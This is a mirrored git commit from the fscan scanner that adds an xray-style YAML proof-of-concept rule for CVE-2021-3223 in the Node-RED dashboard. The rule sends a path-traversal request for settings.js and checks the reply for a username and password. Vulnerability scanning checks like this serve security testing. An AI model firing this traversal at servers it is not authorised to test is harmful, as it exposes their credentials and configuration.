mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,10 @@
|
||||
name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223
|
||||
rules:
|
||||
- method: GET
|
||||
path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
|
||||
detail:
|
||||
author: Print1n(http://print1n.top)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg
|
||||
Reference in New Issue
Block a user